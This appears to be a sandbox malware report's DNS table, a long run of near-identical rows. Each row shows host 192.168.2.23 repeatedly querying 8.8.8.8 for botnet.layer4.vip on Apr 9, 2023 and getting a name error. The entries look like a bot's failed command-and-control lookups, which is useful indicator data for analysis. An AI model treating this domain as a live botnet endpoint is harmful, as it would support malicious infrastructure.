                                  Apr 9, 2023 03:30:32.588067055 CEST8.8.8.8192.168.2.230x9817Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.603724003 CEST8.8.8.8192.168.2.230x9817Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.627981901 CEST8.8.8.8192.168.2.230x9817Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.643954992 CEST8.8.8.8192.168.2.230xaf24Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.668495893 CEST8.8.8.8192.168.2.230xaf24Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.684537888 CEST8.8.8.8192.168.2.230xaf24Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.700450897 CEST8.8.8.8192.168.2.230xaf24Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.728380919 CEST8.8.8.8192.168.2.230xaf24Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.763355970 CEST8.8.8.8192.168.2.230x52c3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.779088974 CEST8.8.8.8192.168.2.230x52c3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.803442955 CEST8.8.8.8192.168.2.230x52c3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.818927050 CEST8.8.8.8192.168.2.230x52c3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.843061924 CEST8.8.8.8192.168.2.230x52c3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.858635902 CEST8.8.8.8192.168.2.230xcbe3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.882626057 CEST8.8.8.8192.168.2.230xcbe3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.898341894 CEST8.8.8.8192.168.2.230xcbe3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.922458887 CEST8.8.8.8192.168.2.230xcbe3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.946501970 CEST8.8.8.8192.168.2.230xcbe3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.962446928 CEST8.8.8.8192.168.2.230x31afName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.986825943 CEST8.8.8.8192.168.2.230x31afName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.002579927 CEST8.8.8.8192.168.2.230x31afName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.026660919 CEST8.8.8.8192.168.2.230x31afName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.042371988 CEST8.8.8.8192.168.2.230x31afName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.058094025 CEST8.8.8.8192.168.2.230x240eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.073561907 CEST8.8.8.8192.168.2.230x240eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.089467049 CEST8.8.8.8192.168.2.230x240eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.113884926 CEST8.8.8.8192.168.2.230x240eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.129800081 CEST8.8.8.8192.168.2.230x240eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.145664930 CEST8.8.8.8192.168.2.230x82a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.161569118 CEST8.8.8.8192.168.2.230x82a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.185947895 CEST8.8.8.8192.168.2.230x82a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.210366011 CEST8.8.8.8192.168.2.230x82a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.234467983 CEST8.8.8.8192.168.2.230x82a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.259021997 CEST8.8.8.8192.168.2.230x5489Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.283179045 CEST8.8.8.8192.168.2.230x5489Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.307324886 CEST8.8.8.8192.168.2.230x5489Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.323307991 CEST8.8.8.8192.168.2.230x5489Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.347496986 CEST8.8.8.8192.168.2.230x5489Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.372193098 CEST8.8.8.8192.168.2.230xa5a1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.396723986 CEST8.8.8.8192.168.2.230xa5a1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.420928001 CEST8.8.8.8192.168.2.230xa5a1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.436624050 CEST8.8.8.8192.168.2.230xa5a1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.461173058 CEST8.8.8.8192.168.2.230xa5a1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.477248907 CEST8.8.8.8192.168.2.230x7691Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.501872063 CEST8.8.8.8192.168.2.230x7691Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.517529011 CEST8.8.8.8192.168.2.230x7691Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.542059898 CEST8.8.8.8192.168.2.230x7691Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.566492081 CEST8.8.8.8192.168.2.230x7691Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.582350016 CEST8.8.8.8192.168.2.230x5028Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.607129097 CEST8.8.8.8192.168.2.230x5028Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.631658077 CEST8.8.8.8192.168.2.230x5028Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.656238079 CEST8.8.8.8192.168.2.230x5028Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.680761099 CEST8.8.8.8192.168.2.230x5028Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.696530104 CEST8.8.8.8192.168.2.230x9481Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.735567093 CEST8.8.8.8192.168.2.230x9481Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.760139942 CEST8.8.8.8192.168.2.230x9481Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.776237011 CEST8.8.8.8192.168.2.230x9481Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.800299883 CEST8.8.8.8192.168.2.230x9481Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.816137075 CEST8.8.8.8192.168.2.230x6a0fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.832139015 CEST8.8.8.8192.168.2.230x6a0fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.848002911 CEST8.8.8.8192.168.2.230x6a0fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.863708019 CEST8.8.8.8192.168.2.230x6a0fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.879585028 CEST8.8.8.8192.168.2.230x6a0fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.904184103 CEST8.8.8.8192.168.2.230xe1c5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.919852018 CEST8.8.8.8192.168.2.230xe1c5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.944272995 CEST8.8.8.8192.168.2.230xe1c5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.959989071 CEST8.8.8.8192.168.2.230xe1c5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.984090090 CEST8.8.8.8192.168.2.230xe1c5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.008745909 CEST8.8.8.8192.168.2.230xe1b8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.032835007 CEST8.8.8.8192.168.2.230xe1b8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.048674107 CEST8.8.8.8192.168.2.230xe1b8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.064516068 CEST8.8.8.8192.168.2.230xe1b8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.080399036 CEST8.8.8.8192.168.2.230xe1b8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.097074032 CEST8.8.8.8192.168.2.230x55d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.121225119 CEST8.8.8.8192.168.2.230x55d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.145329952 CEST8.8.8.8192.168.2.230x55d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.169457912 CEST8.8.8.8192.168.2.230x55d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.193595886 CEST8.8.8.8192.168.2.230x55d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.217946053 CEST8.8.8.8192.168.2.230x7ba9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.242075920 CEST8.8.8.8192.168.2.230x7ba9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.266266108 CEST8.8.8.8192.168.2.230x7ba9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.290757895 CEST8.8.8.8192.168.2.230x7ba9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.314883947 CEST8.8.8.8192.168.2.230x7ba9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.330507040 CEST8.8.8.8192.168.2.230x25f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.354949951 CEST8.8.8.8192.168.2.230x25f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.379477978 CEST8.8.8.8192.168.2.230x25f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.404123068 CEST8.8.8.8192.168.2.230x25f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.428337097 CEST8.8.8.8192.168.2.230x25f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.452699900 CEST8.8.8.8192.168.2.230x38b5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.476948977 CEST8.8.8.8192.168.2.230x38b5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.492501020 CEST8.8.8.8192.168.2.230x38b5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.508347988 CEST8.8.8.8192.168.2.230x38b5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.532799006 CEST8.8.8.8192.168.2.230x38b5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.548793077 CEST8.8.8.8192.168.2.230x9eacName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.572904110 CEST8.8.8.8192.168.2.230x9eacName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.597105980 CEST8.8.8.8192.168.2.230x9eacName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.613183022 CEST8.8.8.8192.168.2.230x9eacName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.628777981 CEST8.8.8.8192.168.2.230x9eacName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.653402090 CEST8.8.8.8192.168.2.230xe714Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.668977976 CEST8.8.8.8192.168.2.230xe714Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.684889078 CEST8.8.8.8192.168.2.230xe714Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.700870037 CEST8.8.8.8192.168.2.230xe714Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.727530956 CEST8.8.8.8192.168.2.230xe714Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.752238035 CEST8.8.8.8192.168.2.230x262dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.768038034 CEST8.8.8.8192.168.2.230x262dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.792167902 CEST8.8.8.8192.168.2.230x262dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.816234112 CEST8.8.8.8192.168.2.230x262dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.840322971 CEST8.8.8.8192.168.2.230x262dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.864784956 CEST8.8.8.8192.168.2.230x4416Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.880722046 CEST8.8.8.8192.168.2.230x4416Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.896567106 CEST8.8.8.8192.168.2.230x4416Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.912187099 CEST8.8.8.8192.168.2.230x4416Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.928069115 CEST8.8.8.8192.168.2.230x4416Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.943758011 CEST8.8.8.8192.168.2.230xbeb1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.967906952 CEST8.8.8.8192.168.2.230xbeb1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.983495951 CEST8.8.8.8192.168.2.230xbeb1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.007985115 CEST8.8.8.8192.168.2.230xbeb1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.032505989 CEST8.8.8.8192.168.2.230xbeb1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.056778908 CEST8.8.8.8192.168.2.230xab95Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.081264019 CEST8.8.8.8192.168.2.230xab95Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.097162008 CEST8.8.8.8192.168.2.230xab95Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.121238947 CEST8.8.8.8192.168.2.230xab95Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.136919022 CEST8.8.8.8192.168.2.230xab95Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.161835909 CEST8.8.8.8192.168.2.230x4a22Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.177501917 CEST8.8.8.8192.168.2.230x4a22Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.193164110 CEST8.8.8.8192.168.2.230x4a22Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.208875895 CEST8.8.8.8192.168.2.230x4a22Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.234309912 CEST8.8.8.8192.168.2.230x4a22Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.250581980 CEST8.8.8.8192.168.2.230x6ab4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.275412083 CEST8.8.8.8192.168.2.230x6ab4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.299854040 CEST8.8.8.8192.168.2.230x6ab4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.323966980 CEST8.8.8.8192.168.2.230x6ab4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.348145962 CEST8.8.8.8192.168.2.230x6ab4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.372905016 CEST8.8.8.8192.168.2.230x447Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.397181034 CEST8.8.8.8192.168.2.230x447Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.421643019 CEST8.8.8.8192.168.2.230x447Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.437254906 CEST8.8.8.8192.168.2.230x447Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.461785078 CEST8.8.8.8192.168.2.230x447Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.477660894 CEST8.8.8.8192.168.2.230x6f51Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.501801968 CEST8.8.8.8192.168.2.230x6f51Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.517507076 CEST8.8.8.8192.168.2.230x6f51Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.542090893 CEST8.8.8.8192.168.2.230x6f51Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.566521883 CEST8.8.8.8192.168.2.230x6f51Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.590915918 CEST8.8.8.8192.168.2.230xc532Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.615196943 CEST8.8.8.8192.168.2.230xc532Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.630872965 CEST8.8.8.8192.168.2.230xc532Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.655255079 CEST8.8.8.8192.168.2.230xc532Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.670867920 CEST8.8.8.8192.168.2.230xc532Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.695224047 CEST8.8.8.8192.168.2.230x7d05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.726650953 CEST8.8.8.8192.168.2.230x7d05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.750801086 CEST8.8.8.8192.168.2.230x7d05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.775144100 CEST8.8.8.8192.168.2.230x7d05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.791054010 CEST8.8.8.8192.168.2.230x7d05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.815382957 CEST8.8.8.8192.168.2.230x7853Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.839777946 CEST8.8.8.8192.168.2.230x7853Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.855593920 CEST8.8.8.8192.168.2.230x7853Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.879767895 CEST8.8.8.8192.168.2.230x7853Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.904226065 CEST8.8.8.8192.168.2.230x7853Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.920216084 CEST8.8.8.8192.168.2.230x5140Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.944302082 CEST8.8.8.8192.168.2.230x5140Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.960716009 CEST8.8.8.8192.168.2.230x5140Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:35.976237059 CEST8.8.8.8192.168.2.230x5140Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.000648022 CEST8.8.8.8192.168.2.230x5140Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.016297102 CEST8.8.8.8192.168.2.230x2c67Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.040508032 CEST8.8.8.8192.168.2.230x2c67Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.056226969 CEST8.8.8.8192.168.2.230x2c67Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.072150946 CEST8.8.8.8192.168.2.230x2c67Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.088211060 CEST8.8.8.8192.168.2.230x2c67Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.113240957 CEST8.8.8.8192.168.2.230xcaeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.129254103 CEST8.8.8.8192.168.2.230xcaeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.145231962 CEST8.8.8.8192.168.2.230xcaeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.169460058 CEST8.8.8.8192.168.2.230xcaeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.193967104 CEST8.8.8.8192.168.2.230xcaeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.209872961 CEST8.8.8.8192.168.2.230xd073Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.234462023 CEST8.8.8.8192.168.2.230xd073Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.259118080 CEST8.8.8.8192.168.2.230xd073Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.274794102 CEST8.8.8.8192.168.2.230xd073Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.298995972 CEST8.8.8.8192.168.2.230xd073Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.324551105 CEST8.8.8.8192.168.2.230x25a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.340517044 CEST8.8.8.8192.168.2.230x25a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.365103960 CEST8.8.8.8192.168.2.230x25a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.389853001 CEST8.8.8.8192.168.2.230x25a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.414057970 CEST8.8.8.8192.168.2.230x25a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.438781977 CEST8.8.8.8192.168.2.230x7a09Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.463248014 CEST8.8.8.8192.168.2.230x7a09Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.478868008 CEST8.8.8.8192.168.2.230x7a09Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
